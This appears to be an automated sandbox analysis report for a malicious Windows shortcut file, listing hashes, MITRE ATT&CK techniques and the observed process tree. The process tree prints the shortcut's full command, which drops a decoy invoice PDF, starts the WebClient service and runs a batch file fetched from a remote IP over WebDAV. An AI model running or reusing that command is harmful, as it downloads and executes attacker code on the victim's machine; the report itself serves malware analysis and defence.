f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
09/05/2024, 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
Size

2KB
MD5

7b5db2de0a2d91a0e6f83080e8dd0d6e
SHA1

5a370fa094efe972929d1e6dc604162821da698b
SHA256

f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747
SHA512

2f816236825717d5aa942898f8320e73883364d76a2fd36c935f9b21f7c034f5176ed2365ff9157e7ccc4e7bbf1b1e1af40c0811619fe481b28fcf0c07f9080c

Score

4^/10

Malware Config

Signatures

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1980	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2572	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2672	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2672	AcroRd32.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2672	AcroRd32.exe
2672	AcroRd32.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2612	2380	cmd.exe	29
PID 2380 wrote to memory of 2612	2380	cmd.exe	29
PID 2380 wrote to memory of 2612	2380	cmd.exe	29
PID 2612 wrote to memory of 2672	2612	cmd.exe	30
PID 2612 wrote to memory of 2672	2612	cmd.exe	30
PID 2612 wrote to memory of 2672	2612	cmd.exe	30
PID 2612 wrote to memory of 2672	2612	cmd.exe	30
PID 2612 wrote to memory of 1980	2612	cmd.exe	31
PID 2612 wrote to memory of 1980	2612	cmd.exe	31
PID 2612 wrote to memory of 1980	2612	cmd.exe	31
PID 2612 wrote to memory of 2572	2612	cmd.exe	32
PID 2612 wrote to memory of 2572	2612	cmd.exe	32
PID 2612 wrote to memory of 2572	2612	cmd.exe	32
PID 2612 wrote to memory of 2348	2612	cmd.exe	34
PID 2612 wrote to memory of 2348	2612	cmd.exe	34
PID 2612 wrote to memory of 2348	2612	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\f33fcd218039e2e9cd50d0342286dcd41268a8b2c6adae6877eb7591c77e7747.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    PID:2672
- - C:\Windows\system32\sc.exe
    sc start webclient
    3⤵
    - Launches sc.exe
    PID:1980
- - C:\Windows\system32\PING.EXE
    ping localhost -n 7
    3⤵
    - Runs ping.exe
    PID:2572
- - C:\Windows\system32\cmd.exe
    cmd.exe /c \\38.180.136.158@80\iZFhhtoO\Offer202447.bat
    3⤵
    PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
f7990247e022bf5b7d09e633ff0f6e6d

SHA1
d2511e80ca516481bda9a0bf13bd45b441c3e780

SHA256
fd352a2335b720596c93bdf0a5fbe8f285e3bf46d5c8f227ccbfab80e6afa701

SHA512
baa35aa38e742cbc3e74b9f8cd95c1f22a698590d5d598d6030c2dd1ebbad3e9cb2bc3082cfeb19ca632eee03818fcbbdd68531119c9ae1a9a6a4c3406ee21e9

Download Submit
C:\Users\Admin\Downloads\NotaFiscal.pdf

Filesize
29B

MD5
823a9caa296579d6a40cd5195d969727

SHA1
5592813787ecff9133229439498d624339c07ece

SHA256
60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

SHA512
77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc

Download Submit